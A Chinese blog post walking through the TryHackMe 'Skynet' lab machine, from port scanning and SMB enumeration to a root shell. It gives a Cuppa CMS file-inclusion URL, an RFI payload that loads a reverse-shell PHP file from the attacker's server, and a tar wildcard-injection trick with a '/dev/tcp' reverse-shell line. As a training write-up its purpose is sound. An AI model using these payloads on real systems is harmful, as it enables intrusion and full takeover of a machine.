TryHackMe-进攻性渗透测试-05_SkyNet

已于 2023-01-15 14:22:03 修改
阅读量192 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: linux 安全 网络安全 web安全
于 2022-12-24 10:36:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128426453
版权

SkyNet

一个易受攻击的终结者主题Linux机器。

循例 nmap 扫

22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds

web貌似没东西,扫一下

顺便看一下smb的anonymous下有没有东西,有四个文件

其中log2和log3都是空文件

attention.txt文件告诉我们系统出现漏洞,许多用户密码被更改,并且出现了疑似管理员的名字:miles dyson

log1.txt文件疑似密码表

看一下gobuster的扫描结果

其中有权访问的:

/squirrelmail

进入这个页面跳转到了一个登录页面,

疑似cms版本

SquirrelMail version 1.4.23 [SVN]

根据密码表,使用burp尝试爆破admin,无果,

想起刚刚的miles dyson,尝试爆破,成功

cyborg007haloterminator

里面有几封关于miles dyson的邮件,其中一封包含他的smb密码

┌──(root💀kali)-[/home/sugobet]
└─# smbclient //10.10.107.156/milesdyson -U milesdyson

在notes文件夹中有一大堆的markdown文件,但入目眼帘的是一个独一无二的txt文件:

importent.txt

包含内容:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

该网页是他的主页:

Miles Dyson个人主页

迈尔斯·班尼特·戴森博士是神经网络处理器的发明者这导致了天网的发展
一个计算机人工智能旨在控制电子链接武器并保卫美国。

到这里就没了,只好尝试对/45kra24zxs28v3yd进行扫描,还真扫出了一个登录页面:

/administrator

尝试了之前的账号和密码,失败

看到是一个Cuppa CMS 去搜索有没有相关的cve

┌──(root💀kali)-[/home/sugobet]
└─# searchsploit Cuppa CMS

存在一个LFI/RFI漏洞

虽然我们不知道任何版本信息,但此时我们别无选择,放手一搏吧

POC:

http://10.10.107.156/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

成功回显passwd

尝试RFI进行reverse shell:

攻击机:

python3 -m http.server 8000

新建窗口:nc -vlnp 8888

payload:

http://10.10.107.156/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.17.14:8000/linux-tools_and_exp/rev_she11.php

成功getshell

升级shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在milesdyson的用户文件夹中发现了backups文件夹里面有一个shell文件:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

该文件夹下还有有个tgz文件,并且我发现每分钟都在读写

很明显了,这是一个定时任务

cat /etc/crontab:

*/1 *	* * *   root	/home/milesdyson/backups/backup.sh

很好,还是root权限执行,我们利用tar通配符注入尝试getroot

cd /var/www/html
touch ./reverse_shell.sh
echo "/bin/bash -i >& /dev/tcp/10.11.17.14/8889 0>&1" > ./reverse_shell.sh
echo ""  > "--checkpoint-action=exec=bash reverse_shell.sh"

成功getroot

Ncat: Connection from 10.10.15.88.
Ncat: Connection from 10.10.15.88:46754.
bash: cannot set terminal process group (2246): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# whoami
whoami
root
Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
TRY HACK ME | Skynet「SMB信息搜集+TAR提权」
AKAHRZ的博客
05-14 847
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG! THM靶场:Skynet「SMB信息搜集+TAR提权」THM靶场:SkynetSteelmountain 靶场通关小结 THM靶场:Skynet 这个房间是一.
绿盟科技网络安全威胁周报2017.17 请关注Squirrelmail 远程代码执行漏洞CVE-2017-7692...
weixin_33857679的博客
09-01 917
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-17,绿盟科技漏洞库本周新增84条,其中高危40条。本次周报建议大家关注Squirrelmail 远程代码执行漏洞。SquirrelMail是以PHP编写的基于标准的webmail包。Squirrelmail 在1.4.22以前的版本中,由于在传递一个字符串给popen调用之前,没有对其进行过...
Tryhackme -Skynet(考点:smb & 密码爆破 & cuppa RFI & cronjob - tar提权)
冬萍子癸水
05-27 536
1 扫描 忘了截图了,就是445 smb和80http,一个进去找敏感文件,另一个进去搜集信息。 2 web信息搜集 gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64 松鼠邮件那个进去后是登录框。但是不知道密码 3 smb利用 enum4linux -a Ip地址 看到有俩处,匿名的当然可以进,mile那个没密码。 进匿名看,再log里,看到很多密码似的,保存下来,可
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
Tryhackme - Retro
冬萍子癸水
05-28 1119
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
windows --skynet_vs2013___.rar
04-09
《Windows环境下Skynet框架与Visual Studio 2013的集成与应用》 在现代软件开发领域,选择合适的开发框架和开发环境对于提高效率、优化能至关重要。Skynet是一款轻量级、高并发的分布式系统框架,尤其适用于游戏...
skynet-guide.github.io
04-05
天网指南.github.io
skynet-mingw:对skynet无任何改动的windows版
08-04
关于skynet-mingw 是的windows平台的实现。其主要特点是: skynet 以submodule链接,方便升级,确保不改。 仅扩展了700行代码,方便维护。 自动更新skynet,自动构建,自动化测试,确保质量。 编译 不想自行编译的...
skynet_example-源码.rar
10-10
Skynet框架以其简洁的架构、高效的并发处理能力和灵活的扩展,为开发者提供了一个强大而实用的工具。通过深入理解其源码,我们可以更好地掌握服务的管理和消息处理,从而在实际项目中发挥出Skynet的优势,构建出...
skynet-mingw-master
09-04
Skynet-mingw-master 是一个基于 Skynet 框架的 Mingw 编译环境项目,适用于 Windows 平台。Skynet 是一个轻量级、高并发的服务框架,广泛应用于网络游戏、实时通信等领域。而 Mingw 是一个为 Windows 平台提供的...
tryhackme-2020圣诞挑战-day10
qq_43200143的博客
12-11 238
SMB (Server Message Block) - Natively supported by Windows and not Linux NFS (Network File System) - Natively supported by Linux and not Windows Samba windows和Linux都支持,而且是加密传输 枚举,利用enum4linux -U进行用户探测 ,发现三个用户 -S 选项获取分享列表,有四个 提示说有
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)
冬萍子癸水
05-26 1170
1 扫描 主要就是80进web搜集信息 C:\root> nmap -A 10.10.16.216 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.64 secon
PHP邮件Squirrelmail远程代码执行漏洞CVE-2017-7692 1.4.22以下版本均受影响 目前没有补丁...
weixin_34217773的博客
09-01 942
攻击者利用该漏洞可以越权执行任意代码,目前Squirrelmail 官方还没有发布相关修复补丁,但第三方提供了修复代码。绿盟科技发布漏洞预警通告,全文如下 北京时间4月19日晚,Squirrelmail被爆出存在一个远程代码执行漏洞(CVE-2017-7692,CNNVD-201704-561)。该漏洞是由于在传递一个字符串给popen调用之前,没有对其...
squirrelmail 小松鼠的安装和配置
王宁的博客
06-08 7437
目录简介: squirrelmail 小松鼠的安装和配置 squirrelmail的配置 Apache 关联 Squirrelmail 修改bool值 测试成功
Linux玩转指南
qq_43535970的博客
07-25 846
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
【linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
景天科技苑
07-25 4670
在Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 655
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux 常用命令分类及示例
简介
07-25 966
【代码】Linux 常用命令分类及示例。
linux mysql 定时备份
java小白白之没有最白的博客
07-25 289
加入以下内容(/xp/server/mysql/bin/mysqldump是你的mysqldump备份命令,一般如果是正常安装的,可以直接用全局命令mysqldump,不用带前面的路径)4、编写crontab。5、查看是否添加成功。
skynet_fly
06-30
抱歉,我不太了解"skynet_fly"的具体含义或内容,这可能是一个特定的技术项目、软件名称、科幻作品中的角色或者是其他某种概念。如果你能提供更多的上下文信息,我会更好地帮助你理解。相关问题如下: 1. "skynet_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值